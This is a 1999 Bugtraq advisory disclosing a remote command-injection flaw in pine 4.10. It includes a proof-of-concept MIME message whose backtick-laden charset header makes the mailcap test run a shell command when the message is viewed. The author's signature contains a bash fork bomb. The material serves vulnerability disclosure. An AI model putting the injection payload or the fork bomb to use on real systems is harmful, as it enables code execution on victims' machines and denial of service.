Bugtraq mailing list archives
remote exploit on pine 4.10 - neverending story?
From: lcamtuf () IDS PL (Michal Zalewski)
Date: Mon, 8 Feb 1999 00:22:17 +0100
Affected systems:
-----------------
Any Un*x system running 'pine' up to version 4.10 (latest).
Compromise:
-----------
Remote execution of arbitrary code when message is viewed.
Details:
--------
About five months ago, I reported vunerability in metamail package used
with pine. I also noticed that '`' character is incorrectly expanded by
pine. Problem has been ignored (probably noone understood what I am
talking about?;-). But no matter. An exception from /etc/mailcap:
text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
'[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput
Impact:
-------
And now, ladies and gentelmen - my old bug, reinvented. Usually, above
mailcap line is expanded to:
[...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
'[a-z]'`" = iso-8859-1)
Hmm, but take a look at this message:
************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attacker () eleet net>
To: Victim <victim () somewhere net>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'
Make a wish...
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"
...it could be your last.
*************************** MIME MESSAGE ENDS ***************************
The result is:
[...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
'[A-Z]' '[a-z]'`" = iso-8859-1)
...and arbitrary code ('touch ME', encoded using ${IFS} trick) is
executed when message is viewed.
Fix:
----
Well, it's the second time I report problems with ` in headers.
Maybe pine developers should wait a little longer ;-)
_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
Current thread:
- Re: Cyrix bug: freeze in hell, badboy John Byrne (Feb 05)
- Re: Cyrix bug: freeze in hell, badboy Phillip R. Jaenke (Feb 05)
- HP-UX 11.0/800 patches leave suid binaries Lamont Granquist (Feb 05)
- Re: HP-UX 11.0/800 patches leave suid binaries Olle Segerdahl,D (Feb 08)
- Re: Cyrix bug: freeze in hell, badboy Ragnar Hojland Espinosa (Feb 06)
- remote exploit on pine 4.10 - neverending story? Michal Zalewski (Feb 07)
- Re: remote exploit on pine 4.10 - neverending story? Thomas Roessler (Feb 08)
- Re: remote exploit on pine 4.10 - neverending story? John D. Hardin (Feb 08)
- Possible Security Problem: Fake PGP Key Ben Laurie (Feb 08)
- ISS Internet Scanner Cannot be relied upon for conclusive Audits Mr. joej (Feb 07)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive David LeBlanc (Feb 08)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive blkadder () VALUE NET (Feb 08)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive BVE (Feb 08)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive David LeBlanc (Feb 09)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive Jim Trocki (Feb 11)
- How scanners actually work David LeBlanc (Feb 10)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive David LeBlanc (Feb 08)